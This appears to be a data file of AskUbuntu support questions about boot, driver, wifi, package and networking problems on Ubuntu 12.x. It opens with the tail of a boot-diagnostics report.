/etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/30_uefi-firmware # # # # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ { config_directory } /custom.cfg ] ; then source $ { config_directory } /custom.cfg elif [ -z `` $ { config_directory } '' -a -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =============================== sdb1/etc/fstab : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sdb1 during installation uuid=b6b5fc35-3afb-4a94-b3b8-9b618a83493a / ext4 errors=remount-ro 0 1 # swap was on /dev/sdb5 during installation # uuid=9084399e-5455-4b30-8e00-c47a3f489f7c none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sdb1 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) 250.227775574 = 268.680028160 boot/grub/grub.cfg 1 3.701530457 = 3.974488064 boot/initrd.img-3.5.0-17-generic 1 418.134727478 = 448.968744960 boot/vmlinuz-3.5.0-17-generic 1 3.701530457 = 3.974488064 initrd.img 1 3.701530457 = 3.974488064 initrd.img.old 1 418.134727478 = 448.968744960 vmlinuz 1 ======================== unknown mbrs/boot sectors/etc : ======================== unknown bootloader on sdb2 00000000 00 00 00 00 20 20 00 00 24 00 3c 00 62 00 75 00 | ... . .. $ . < .b.u.| 00000010 65 00 5f 00 73 00 70 00 65 00 69 00 63 00 68 00 |e._.s.p.e.i.c.h.| 00000020 65 00 72 00 6e 00 5f 00 32 00 5b 00 31 00 5d 00 |e.r.n._.2. [ .1 . ] .| 00000030 c6 68 27 3d 00 00 00 00 af 68 27 3d 00 00 00 00 |.h'= ... ..h'= ... .| 00000040 af 68 27 3d 00 00 00 00 68 00 00 00 00 00 00 00 |.h'= ... .h ... ... .| 00000050 01 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| 00000060 0b 00 0b 00 28 00 20 00 48 00 20 00 18 00 01 00 | ... . ( . .h . ... ..| 00000070 08 01 00 00 00 00 02 00 17 00 00 00 00 00 00 00 | ... ... ... ... ... .| 00000080 1a 00 00 00 00 00 00 00 00 00 e8 0b 00 00 00 00 | ... ... ... ... ... .| 00000090 18 a7 e5 0b 00 00 00 00 18 a7 e5 0b 00 00 00 00 | ... ... ... ... ... .| 000000a0 00 00 28 02 00 00 00 00 00 00 e8 0b 00 00 00 00 |.. ( ... ... ... ... .| 000000b0 b8 a6 e5 0b 00 00 00 00 18 a7 e5 0b 00 00 00 00 | ... ... ... ... ... .| 000000c0 00 00 28 02 00 00 00 00 d9 68 27 3d 00 00 00 00 |.. ( ... ... h'= ... .| 000000d0 c6 68 27 3d 00 00 00 00 00 00 00 00 00 00 00 00 |.h'= ... ... ... ... | 000000e0 28 00 00 00 00 00 00 00 01 00 00 00 18 00 00 00 | ( ... ... ... ... ... | 000000f0 00 00 00 00 00 00 00 00 1b 00 01 00 28 00 00 00 | ... ... ... ... ( ... | 00000100 28 00 00 00 18 00 00 00 00 00 00 00 00 00 02 00 | ( ... ... ... ... ... | 00000110 00 00 00 00 00 00 00 00 0a 00 00 00 01 00 00 00 | ... ... ... ... ... .| 00000120 e4 68 27 3d 00 00 00 00 00 00 00 00 00 00 00 00 |.h'= ... ... ... ... | 00000130 00 00 00 00 00 00 00 00 a8 00 00 00 00 00 00 00 | ... ... ... ... ... .| 00000140 01 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| 00000150 07 00 07 00 28 00 40 00 68 00 40 00 18 00 01 00 | ... . ( . @ .h . @ ... ..| 00000160 38 00 20 00 00 00 02 00 23 00 00 00 00 00 00 00 |8 . ... .. # ... ... .| 00000170 26 00 00 00 00 00 00 00 91 b8 c2 91 25 32 cd 01 | & ... ... ... .. % 2..| 00000180 91 b8 c2 91 25 32 cd 01 91 b8 c2 91 25 32 cd 01 | ... . % 2 ... ... % 2..| 00000190 06 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | . ... ... ... ... ..| 000001a0 00 00 00 00 11 01 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| 000001b0 38 36 e1 0b 00 00 00 00 31 57 c0 91 25 32 00 fe |86 ... ... 1w.. % 2..| 000001c0 ff ff 82 fe ff ff 02 00 00 00 00 68 fc 00 00 00 | ... ... ... ..h ... .| 000001d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| * 000001f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 aa | ... ... ... ... ..u.| 00000200 ========= devices which do n't seem to have a corresponding hard drive : ========= sdc =============================== stderr messages : =============================== xz : ( stdin ) : komprimierte daten sind korrupt
269722	does `` no such device '' - > grub rescue on on an established system herald a catastrophic event ?	i 've already found plenty of threads on `` no such device '' and grub rescue on askubuntu , but i 'm wondering what this signifies if it happens not on a fresh install , but on a computer that has been behaving normally for well over a year . is this a sign of catastrophic hard drive failure , or possibly another issue ? or is it a just-happens kind of thing that crops up from time to time with ubuntu ?
269725	log in fails after installing additional drivers	so i updated my graphic drivers using the additional drivers option and restarted my computer upon completion . now when i try to log in everything looks fine , i put in my password and hit enter , what comes up next is the screen with one ( 1 ) distorted icon on the desktop , and the background , nothing more . how can i revert back to the default graphic drivers so i can boot into ubuntu again ? let me know if you need anymore details .
269726	ubuntu 12.10 nvidia geforce 320m macbook ( mid 2010 - white clamshell )	so basically x ca n't start on my macbook mid 2010 running the geforce 320m after installing the geforce driver . it never really came up properly even out of the box , though the live version seemed to work fine before i installed . after it did n't startup properly , i went to the terminal and did an apt-get upgrade . then i ran apt-get install nvidia-current-updates and ran the command apt-get install linux-headers-`uname -r` which i found worked for someone else here to get the driver going . this has n't worked for me . the driver appears to be installed fine but upon restart it just hangs before getting to launch an x server . i rebooted to a root terminal and checked /var/log/xorg.0.log and found the following . http : //pastebin.com/8ts3639y so fine , i found this online to resolve this issue : nvidia-xconfig which generates a default xorg.conf file at /etc/x11/ but now i have a new issue . when i boot , it gets stuck with this output on the screen : brcms_ops_info_changed : arp : filtering : enabled true count ( 0 ) ( implement ) brcms_ops_info_changed : qos enabled : false ( implement ) brcms_ops_info_changed : arp filtering : enabled true count ( 0 ) ( implement ) i still get the failed initialisation of screen error above . when i open the xorg.conf generated by nvidia-xconfig command , i can see the following : http : //pastebin.com/zex6n9xj i have dmesg output but you need more than 2 rep to post : pastebin.com/dl6fxtwe
269727	npm errors when installing packages on windows share	i have ubuntu 12.10 running as a vmware guest on my windows 8 host . i have shared a folder on my windows 8 host and it is mounted in the ubuntu guest on startup using this entry in fstab : //myhost/work /work cifs credentials=/home/user/.smbcredentials , noserverino , nounix , uid=user , gid=user , file_mode=0777 , dir_mode=0777 0 0 the share works fine and is able to be served by a webserver such as nginx . however , there seems to be issues when i install node.js packages using npm , i get a bunch of errors like this : user @ ubuntu : /work/test $ sudo npm install grunt npm http get https : //registry.npmjs.org/grunt npm http 304 https : //registry.npmjs.org/grunt ... npm err ! error rolling back error : enotempty , rmdir '/work/test/node_modules/grunt/node_modules/lodash' npm err ! error rolling back grunt @ 0.4.1 { [ error : enotempty , rmdir '/work/test/node_modules/grunt/node_modules/lodash ' ] npm err ! error rolling back errno : 53 , npm err ! error rolling back code : 'enotempty ' , npm err ! error rolling back path : '/work/test/node_modules/grunt/node_modules/lodash ' } npm err ! error : unknown , symlink '../which/bin/which' npm err ! if you need help , you may report this log at : npm err ! < http : //github.com/isaacs/npm/issues > npm err ! or email it to : npm err ! < npm- @ googlegroups.com > npm err ! system linux 3.5.0-26-generic npm err ! command `` /usr/bin/node '' `` /usr/bin/npm '' `` install '' `` grunt '' npm err ! cwd /work/test npm err ! node -v v0.10.0 npm err ! npm -v 1.2.14 npm err ! path ../which/bin/which npm err ! code unknown npm err ! errno -1 npm err ! error : enoent , chmod '/work/test/node_modules/grunt/node_modules/findup-sync/test/fixtures/aaa.txt' npm err ! if you need help , you may report this log at : npm err ! < http : //github.com/isaacs/npm/issues > npm err ! or email it to : npm err ! < npm- @ googlegroups.com > npm err ! system linux 3.5.0-26-generic npm err ! command `` /usr/bin/node '' `` /usr/bin/npm '' `` install '' `` grunt '' npm err ! cwd /work/test npm err ! node -v v0.10.0 npm err ! npm -v 1.2.14 npm err ! path /work/test/node_modules/grunt/node_modules/findup-sync/test/fixtures/aaa.txt npm err ! fstream_path /work/test/node_modules/grunt/node_modules/findup-sync/test/fixtures/aaa.txt npm err ! fstream_type file npm err ! fstream_class filewriter npm err ! fstream_finish_call chmod npm err ! code enoent npm err ! errno 34 npm err ! fstream_stack /usr/lib/node_modules/npm/node_modules/fstream/lib/writer.js:305:19 npm err ! fstream_stack object.oncomplete ( fs.js:93:15 ) npm err ! error : enoent , lstat '/work/test/node_modules/grunt/node_modules/minimatch/test/basic.js' npm err ! if you need help , you may report this log at : npm err ! < http : //github.com/isaacs/npm/issues > npm err ! or email it to : npm err ! < npm- @ googlegroups.com > npm err ! system linux 3.5.0-26-generic npm err ! command `` /usr/bin/node '' `` /usr/bin/npm '' `` install '' `` grunt '' npm err ! cwd /work/test npm err ! node -v v0.10.0 npm err ! npm -v 1.2.14 npm err ! path /work/test/node_modules/grunt/node_modules/minimatch/test/basic.js npm err ! fstream_path /work/test/node_modules/grunt/node_modules/minimatch/test/basic.js npm err ! fstream_type file npm err ! fstream_class filewriter npm err ! code enoent npm err ! errno 34 npm err ! fstream_stack /usr/lib/node_modules/npm/node_modules/fstream/lib/writer.js:284:26 npm err ! fstream_stack object.oncomplete ( fs.js:93:15 ) npm err ! error : enoent , lstat '/work/test/node_modules/grunt/node_modules/glob/test/00-setup.js' npm err ! if you need help , you may report this log at : npm err ! < http : //github.com/isaacs/npm/issues > npm err ! or email it to : npm err ! < npm- @ googlegroups.com > ... npm err ! not ok code 0 user @ ubuntu : /work/test $ what could be causing this problem ? from the command line , i can chmod , rmdir among other things using sudo without any issues .
269728	how to use kdm instead of lightdm in kubuntu	i need to configure kdm by system settings , because lightdm is not working any more ( i do n't know why , just stopped working ) , so , is there any way to do it ?
269729	document management private users	i am searching for a document management system that supports : can bulk scan documents automatic ocr of scanned documents data storage on my local hd / external server of my choice automatic backups ( not that important ) proper full text search document versioning ( automatic ) document categorization or tagging platform independent free do you know a document management system fulfilling these requirements ?
269732	dod cac reader setup ubuntu 12.04	i read that i need to download cackey from forge.mil but the download is n't there any more . how can i get my cac reader working now ? is there a sudo apt-get command for it ? does someone have a copy of the file ? is it located else where because i ca n't find it .
269737	international accents out of dead keys in lubuntu	from the first moment , after the installation of lubuntu 12.04 , i can not type greek accents , when the greek layout is selected . the greek layout works with some dead keys , i.e . pressing ; + α gives accented α etc . in my case the dead key is ignored and α remains without an accent . i have looked all similar questions in askubuntu or forums , but they do not seem to provide a solution to the exact problem for greek .
269742	ubuntu phone app development clarification	i attempting to follow the ubuntu phone app development tutorial to make a currency converter , and i am simply unable to complete the tutorial . i have installed all of the latest qt/phone related content available from the ppa 's in the guide . i press ctrl+n to open a new project , but i am lost as soon as i reach this window : the guide is not clear as to what to do at this window . my guess is that the qt creator provided by the ppa has been updated/changed slightly since this guide was made 3 months ago . can someone clarify what to do next so i can complete the currency converter tutorial ? or maybe to make a picture guide from start to finish in your answer ? thank you !
269746	how do i make my current installation of 12.04 like when i first installed it ?	i recently did a project involving a lot of messy installs . after manually undoing what evil i have done i realize i have broken a lot of dependencies and instead of manually slaving over each one , i 'd like to 'go back in time ' , before i messed up my installation .
269750	are there dress making applications ?	there probably is n't but i envisage creating models of people and then dressing them with various clothes . sort of virtual barbie dress up . its hard to visualize patterns on clothes and would like to do it digitally if possible . can anyone give me some direction ?
269756	dell inspiron 1545 with ubuntu	i 've installed ubuntu on a dell inspiron 1545 and i 'm not sure how to connect to my router wirelessly . it 's asking for some information that i have n't seen before . in a window titled , editing wireless conenction 1 under the wireless tab i see : ssid ( i know what this is ) mode bssid device mac address cloned mac address mtu if any of you could help me i 'd greatly appreciate it !
269757	consolas not visible in intellij idea on ubuntu 12.04	tried installing consolas on ubuntu 12.04 as suggested here but the font is not visible in the settings of intellij idea ce ide . [ edit 1 ] i also copied the font to /usr/lib/jvm/jdk1.6.0_30/jre/lib/fonts and did sudo fc-cache . now the font is visible in gedit but is still not visible in intellij idea and it not visible in libre office3 . appreciate help .
269762	logitech solar keyboard k750 only works in usb 2.0 but not in usb 3.0	so the title is pretty straightforward , i have the logitech k750 solar keyboard , and it literally will not function at all when i plug the usb receiver into a usb 3.0 port , but works great when i plug it into a usb 2.0 port . it 's not a huge deal , but i 'd like to put the receiver into a usb port in the back of my computer to free up my usb ports in the front and there are n't any usb 2.0 ports back there . i have checked the usb 3.0 ports with a flash drive i have , and they worked , so i do n't believe it 's a problem with the usb ports , but maybe i need drivers ? any help would be greatly appreciated , and the more specific the details the better as i 've only had a stable version of linux for about 2 days . ( getting the nvidia drivers to work correctly was a real pain ! ) thanks !
269763	why is drop box always trying and failing to connect to me on a high port in iptables logs ?	continually getting message in logs : iptables packet dropped : in=eth1 out= mac=c4:17 : fe:65:51 : f8:20:76:00 : aa:98:78:08:00 src=199.47.216.148 dst=192.168.1.102 len=218 tos=0x00 prec=0x00 ttl=54 id=52253 df # proto=tcp spt=80 dpt=60684 window=31 res=0x00 ack psh urgp=0 i did a whois and know that the source ip 199.47.216.148 has something to do with dropbox , which i do have installed , but why is it continually trying to connect to me on my 60684 port and clogging up the logs ? dropbox is otherwise working completely fine . it has established connections like dropbox 2409 myuser 17u ipv4 220578 0t0 tcp 127.0.0.1:37255- > 127.0.0.1:8080 ( close_wait ) dropbox 2409 myuser 23u ipv4 221364 0t0 tcp 127.0.0.1:37273- > 127.0.0.1:80y80 ( close_wait ) dropbox 2409 muser 26u ipv4 221496 0t0 tcp 127.0.0.1:37279- > 127.0.0.1:8080 ( established ) dropbox 2409 myuser 27u ipv4 216008 0t0 tcp 127.0.0.1:37261- > 127.0.0.1:8080 ( close_wait ) ( i should perhaps mention that i have privoxy and dansguardian installed too , so only privoxy is allowed http , https outbound to port 80 , and only dansguardian is allowed local outbound to privoxy which listens on 8118 , and firefox is then forced to connect to dansguardian on 127.0.0.1:8080 . this means dropbox connects through a `` proxy '' of 127.0.0.1:8080 too , just like firefox does . not sure this has any relevance but just incase . pretty much all other standard outbound is allowed. ) my iptables rules for reference are set to drop and log all inbound connections unless tracked by iptables -a input -m conntrack -- ctstate established , related -j accept iptables -a output -m conntrack -- ctstate established , related -j accept as i say the strange thing is that dropbox appears to otherwise work fine , so whatever it wants with this inbound connection must be pretty minor , but it is annoying to continually see it in the logs .
269766	how do i make my bios boot on shimx64.efi file ?	after i did a boot-repair , http : //paste.ubuntu.com/5627076/ , i get this message : please do not forget to make your bios boot on sda2/efi/ubuntu/shimx64.efi file ! i can go to the bios but there is no option about that shimx64.efi file . how do i make my bios boot on sda2/efi/ubuntu/shimx64.efi file ?
269770	is `` ubuntu for phones '' as powerful as ubuntu for pc 's ?	i recently got a quad-core smartphone , and i am wanting to squeeze out every bit of performance and productivity out of it . i have been looking around and ca n't seem to find a straight answer on some questions i have . first off , is ubuntu for phones actually a full fledged distribution or is is stripped down to be more of a phone-like os ? would i be able to download programs that are available for linux ? be able to run .deb packages ? open a terminal ? and lastly , is there a way to install the latest distro of ubuntu onto my mobile device ? in replacement of android ( for experimental purposes ) ? the only answers i can find is to vnc into it on your phone , but it is still too slow and laggy . i understand one would have to pull the drivers from one owns device but surely this is possible ? thank you for your time in reading this and i am very interested in hearing your thoughts or information leading me to my answers !
269775	mv : directory not empty	i want to move content of a directory within another directory with the same folders . here 's an example : i have ./backup wich have the directories `` base '' and `` test '' . now i want to move these directories in ./backuparchives . i use this : mv ./backup/* ./backuparchives but i got the error mv : can not move './backup/base ' to './backupsarchive/base ' : directory not empty i tried using -- force , but no luck . is there a way to move it when folders already exists ? note : i just want to merge contents , there 's no overwriting .
269777	unable to connect mobile broadband ubuntu 12.10	i recently installed ubuntu 12.10 on my desktop . now the mobile connection was not working , which i later found out to be a bug in modem manger so i downgraded it to v0.5.2 but still the problem persists . whenever i try connecting , the mobile broadband option gets automatically disabled . i have a bsnl evdo connection , which i had to manually configure as the device was not automatically detected at first .
269778	wifi not working on dell laptop in ubuntu	i recently installed ubuntu 12.04 on my machine , but i am not able to use wi-fi in ubuntu . actually there is a toggle button to turn on the wifi and when the wifi is on an led will glow . but all the time i presses that button it do n't glow . so i tried installing the driver form the solution suggested in question : how do i install bcm43142 wireless drivers for dell vostro 3460/3560 since the wifi device on my machine is also broadcom corporation device [ 14e4:4365 ] . i got the driver successfully installed but still i am not able to turn on the wifi means the led not glows . also here are the output of some commands which might be helpful lshw -c network *-network unclaimed description : network controller product : broadcom corporation vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : bus_master cap_list configuration : latency=0 resources : memory : f1900000-f1907fff and iwconfig lo no wireless extensions . usb0 no wireless extensions . here usb0 is what i am using with my mobile connected with data cable to access internet . and rfkill list 0 : dell-wifi : wireless lan soft blocked : no hard blocked : no 1 : dell-bluetooth : bluetooth soft blocked : no hard blocked : no also one more thing when i toggle the wifi button off the rfkill list gives both in blocked mode . please help ... thanks .
269781	software center installation stuck after script cancellation	attempted to add the matlab installation and it asked me where my current installation was -- never have tried to install it before -- i hit cancel when it asked for the installation directory and now ububtu software center bogs down the machine and everything in line to download and install behind it in the queue is hosed . no places to hit pause or cancel for any of the line items . just says `` applying updates '' and is in the list no matter what ( i already closed out usc and restarted the machine several times ) . how should i proceed to get this out of the way ? is it an usc specific problem or an installation script problem ? tia @ dobey : i do not have matlab installed -- i was shopping on the usc , saw the matlab icon , tried to download the package . `` bogs down the machine '' as in usc pulls 22 % usage all by itself and the rest of the system suffers . the package is in limbo because it does not show as installed nor in history , so how do i kill the package from my usc download list ? @ daniel llewellyn both commands say the same thing at the end : 1 not fully installed or removed debconf : dbdriver `` config '' /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing man-db ( -- configure ) : sun process installed post-installation script returned error exit status 1 no apport report written because maxrrports is reached already errors were encountered while processing : man-db e : sub-process /usr/bin/dpkg returned an error code ( 1 )
269783	how do i firewall my computer so that only traffic go through the vpn ?	i have read `` how to configure an ubuntu server so that all traffic goes through a vpn ? '' and found it does n't apply to my case . i am only interested in the client-side of the vpn connection as i am a customer of a commercial vpn service provider . i wish to route all network traffic through my vpn connection so that when it drops for whatever reason , all internet access is immediately terminated . how do i go about configuring ubuntu 12.10 ?
269784	synaptics multitouch not working 12.04	i have a laptop ( acer 7745g ) with a synaptics touchpad that should support up to 3 finger multitouch if i am interpreting the output of grep `` touchpad : buttons '' /var/log/xorg.0.log correctly . the output is below . [ 7.805 ] ( -- ) synaptics : synps/2 synaptics touchpad : buttons : left right double triple scroll-buttons two finger scrolling works fine but 3 finger gestures do not work in unity for some reason . i have put the following configuration in xorg.conf.d/synaptics.conf : section `` inputclass '' identifier `` touchpad '' # required matchistouchpad `` yes '' # required driver `` synaptics '' # required option `` tapbutton3 '' `` 3 '' option `` shmconfig '' `` true '' endsection and i have recieved the following output from synclient -m time x y z f w l r u d m multi gl gm gr gdx gdy 48.144 5327 2456 112 3 5 0 0 0 0 0 00000000 if i am not mistaken , the 3 means it is recognizing that there are 3 fingers on the touchpad . all of these things seem to me like they should point to unity multitouch working but i can not use any of the 3 finger multitouch gestures for some reason . i 'm sure i 'm missing something that should be simple but for some reason i can not figure out what it is . any help would be greatly appreciated .
269788	ca n't make rtl8188ce drivers	i just downloaded the rtl8188ce drivers striaght from realtek website . i have both build-essentials and linux-generic-headers installed . i go to the top directory of the downloaded driver and run make in the terminal . i keep getting the following error . make -c /lib/modules/3.5.0-25-generic/build m=/home/mo/documents/asus pce-n15 drivers/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.5.0-25-generic' make [ 1 ] : *** no rule to make target `pce-n15 ' . stop . make [ 1 ] : leaving directory `/usr/src/linux-headers-3.5.0-25-generic' make : *** [ all ] error 2 i am trying to install drivers for asus pce-n15 wifi card . this is the makefile : cc = gcc kver : = $ ( shell uname -r ) ksrc : = /lib/modules/ $ ( kver ) /build moddestdir : = /lib/modules/ $ ( kver ) /kernel/drivers/net/wireless/rtlwifi firmwaredir : = /lib/firmware/ pwd : = $ ( shell pwd ) clr_module_files : = *.mod.c *.mod *.o . *.cmd *.ko *~ .tmp_versions* modules.order module.symvers symbol_file : = module.symvers extra_cflags += -o2 obj-m : = rtlwifi.o pci_main_objs : = base.o \ rc.o \ debug.o \ regd.o \ efuse.o \ cam.o \ ps.o \ core.o \ stats.o \ pci.o \ rtlwifi-objs += $ ( pci_main_objs ) all : $ ( make ) -c $ ( ksrc ) m= $ ( pwd ) modules @ cp $ ( symbol_file ) rtl8192ce/ @ make -c rtl8192ce/ @ cp $ ( symbol_file ) rtl8192se/ @ make -c rtl8192se/ @ cp $ ( symbol_file ) rtl8192de/ @ make -c rtl8192de/ @ cp $ ( symbol_file ) rtl8723e/ @ make -c rtl8723e/ @ cp $ ( symbol_file ) rtl8188ee/ @ make -c rtl8188ee/ install : all find /lib/modules/ $ ( shell uname -r ) -name `` r8192se_*.ko '' -exec rm { } \ ; find /lib/modules/ $ ( shell uname -r ) -name `` r8192ce_*.ko '' -exec rm { } \ ; find /lib/modules/ $ ( shell uname -r ) -name `` r8723e_*.ko '' -exec rm { } \ ; find /lib/modules/ $ ( shell uname -r ) -name `` r8188ee_*.ko '' -exec rm { } \ ; @ rm -fr $ ( firmwaredir ) /`uname -r`/rtlwifi $ ( shell rm -fr $ ( moddestdir ) ) $ ( shell mkdir $ ( moddestdir ) ) $ ( shell mkdir $ ( moddestdir ) /rtl8192se ) $ ( shell mkdir $ ( moddestdir ) /rtl8192ce ) $ ( shell mkdir $ ( moddestdir ) /rtl8192de ) $ ( shell mkdir $ ( moddestdir ) /rtl8723e ) $ ( shell mkdir $ ( moddestdir ) /rtl8188ee ) @ install -p -m 644 rtlwifi.ko $ ( moddestdir ) @ install -p -m 644 ./rtl8192se/rtl8192se.ko $ ( moddestdir ) /rtl8192se @ install -p -m 644 ./rtl8192ce/rtl8192ce.ko $ ( moddestdir ) /rtl8192ce @ install -p -m 644 ./rtl8192de/rtl8192de.ko $ ( moddestdir ) /rtl8192de @ install -p -m 644 ./rtl8723e/rtl8723e.ko $ ( moddestdir ) /rtl8723e @ install -p -m 644 ./rtl8188ee/rtl8188ee.ko $ ( moddestdir ) /rtl8188ee @ depmod -a @ # copy firmware img to target fold @ # $ ( shell [ -d `` $ ( firmwaredir ) /`uname -r` '' ] & & cp -fr firmware/rtlwifi/ $ ( firmwaredir ) /`uname -r`/ . ) @ # $ ( shell [ ! -d `` $ ( firmwaredir ) /`uname -r` '' ] & & cp -fr firmware/rtlwifi/ $ ( firmwaredir ) / . ) @ cp -fr firmware/rtlwifi/ $ ( firmwaredir ) / uninstall : $ ( shell [ -d `` $ ( moddestdir ) '' ] & & rm -fr $ ( moddestdir ) ) @ depmod -a @ # delete the firmware img @ rm -fr /lib/firmware/rtlwifi/ @ rm -fr /lib/firmware/`uname -r`/rtlwifi/ clean : rm -fr *.mod.c *.mod *.o . *.cmd *.ko *~ rm -fr .tmp_versions rm -fr modules.symvers rm -fr module.symvers rm -fr module.markers rm -fr modules.order rm -fr tags @ find -name `` tags '' -exec rm { } \ ; @ rm -fr $ ( clr_module_files ) @ make -c rtl8192ce/ clean @ make -c rtl8192se/ clean @ make -c rtl8192de/ clean @ make -c rtl8723e/ clean @ make -c rtl8188ee/ clean
269791	can not get canon pixma mx 439 to install ubuntu 11.10	i have searched everywhere to get this all in one printer installed . i need it for my job and its taken two days so far to at least get something close to it installed . i downloaded the drivers for the 430 series , and that 's what i have set up right now under my printers . i 'm using ubuntu 11.10 , i have not updated , because i prefer to back up my files before i do , and my job is 24/7 so i have not found the time . last printer i had was an epson without fax capabilites . that printer i installed just by plugging it into my computer . with this canon , it wo n't do that ( which is why i 'm at a loss , i got spoiled by that quick install and i 'm just dumb when it comes to computers at times ) . with the drivers for the 430 series installed , i restarted the computer , and went to print a test page , the notification bubble showed up saying the printing had started and then completed , but no test page had printed . that is where i am stuck at . any advice and help would be appreciated . please , when you do explain , please take it step by step , i 'm still not comfortable working in the terminal section of ubuntu , and could you please explain what i 'm trying to do like if i need to rename a file based on what is on my computer as opposed to yours . i 've tried several tutorials , but they do n't really explain what i 'm trying to do well . melinda
269792	raise and focus running application when opening file in nautilus ?	i 'm using ubuntu 12.04 with and would like to know how i can configure it so that when i double click on a file , and it opens it with an already running program , it will raise and focus that program . i 'd like to know how to do this under both unity and gnome classic , with either compiz or metacity . i 'd guess that this behavior is decided by nautilus but i 'm not sure . i 'd like to know a solution , even if it involves patching and compiling nautilus . someone entered this as a bug once , https : //bugs.launchpad.net/hundredpapercuts/+bug/386520 , but it was marked invalid . i understand that most people might like the default behavior , but i find it an inconvenience that whenever i double click a file i have to find and select the window .
269794	prozilla installing error	i am trying to install prozilla.but this below error is occurred.how can i solve this case ? dpkg : error processing /var/cache/apt/archives/prozilla_2.0.4~quantalbuild1-0tahutek1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/share/locale/locale.alias ' , which is also in package locales 2.13+git20120306-3 processing triggers for man-db ... processing triggers for lintian ... errors were encountered while processing : /var/cache/apt/archives/prozilla_2.0.4~quantalbuild1-0tahutek1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
269797	ca n't boot into windows ?	i installed ubuntu on a second hard drive inside the computer by booting with the cd . i now want to switch back to my main hard drive but i do n't know how . when i unplug the linux hd it goes into this black grub thingy and i do n't know if my windows got deleted because i did n't touch that hd . i do n't have a windows disk , my computer came with windows 8 . i need help please ...
269810	how i can connect the syslog-ng with a mysql database ?	hi guys i want to use a syslog-ng server for logging data from the firewall and i get data from the firewall in the file /var/firewall.log but now i want that the logs go to a database . for this i have install a mysql database and phpmyadmin on my ubuntu system . what i must change in the syslog-ng.conf and what i must do with the database . here is my syslog-ng.conf : source s_firewall { udp ( ) ; } ; destination d_firewall { file ( `` /var/log/firewall.log '' ) ; } ; filter f_firewall { netmask ( `` 172.16.10.163/255.255.255.255 '' ) ; } ; log { source ( s_firewall ) ; filter ( f_firewall ) ; destination ( d_firewall ) ; } ; and this is in my log file : ... mar 14 15:47:09 172.16.10.163 kernel : arpresolve : ca n't allocate llinfo for 172.16.1.254 mar 14 15:47:09 172.16.10.163 kernel : arpresolve : ca n't allocate llinfo for 172.16.1.254 mar 14 15:47:10 172.16.10.163 pf : 00:00:34.029607 rule 47/0 ( match ) : pass in on le2 : ( tos 0x10 , ttl 16 , id 0 , offset 0 , flags [ none ] , proto udp ( 17 ) , length 246 ) mar 14 15:47:10 172.16.10.163 pf : 00:00:34.029607 rule 47/0 ( match ) : pass in on le2 : ( tos 0x10 , ttl 16 , id 0 , offset 0 , flags [ none ] , proto udp ( 17 ) , length 246 ) ...
269816	howto change notification icons in gnome 3 fallback panel ?	i like to change the notification icons on the bottom panel , because the panel is nearly the same as the panels backround gradient ...
269817	vlc `` : rate=2.0 '' - where do i put this in command-line ?	i figured out a way to transcode my videos so that they would play at double speed using the gui as `` convert/stream '' -- > `` show more options '' and adding `` : rate=2.0 '' after `` : file-caching=300 '' in the `` edit options '' box . where exactly do i put this `` : rate=2.0 '' when i am transcoding my video using command-line ? for eg : vlc -vvv `` my video.avi '' : sout= '' # transcode { width=320 , canvas-height=240 , vcodec=mp4v , vb=768 , acodec=mp4a , ab=96 , channels=2 } : std { access=file , mux=mp4 , url=myvideo.mp4 } '' vlc : quit where do i put `` : rate=2.0 '' ? ? i am doing this so that i can use a bash script to batch-convert video lectures so that i can play them on my ipod at double speed .
269819	ubuntu : desktop sidebar is not appearing	i am facing an issue while starting my ubuntu 12.04lts system . the launcher is not appearing on the desktop . i already used unity -- reset command and applications -files but still i am getting the same desktop . my screen is appearing properly while opening my ubuntu system in recovery mode . please help me otherwise i have to format my system . thanks
269820	what mean the `` e : unmet dependencies ''	i was tried to install the `` prozilla '' but , i was cancel the installing while process is run.so now here , below error is occurred , when i try to install any software.that 's mean i ca n't install any software , because this.does anyone know what mean this error and how can i solve this case.thanks you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : apt-proz : depends : prozilla but it is not going to be installed aptitude : depends : aptitude-common ( = 0.6.8.1-2ubuntu1 ) but it is not going to be installed depends : libboost-iostreams1.49.0 ( > = 1.49.0-1 ) but it is not going to be installed depends : libcwidget3 but it is not going to be installed depends : libept1.4.12 ( > = 1.0.9 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
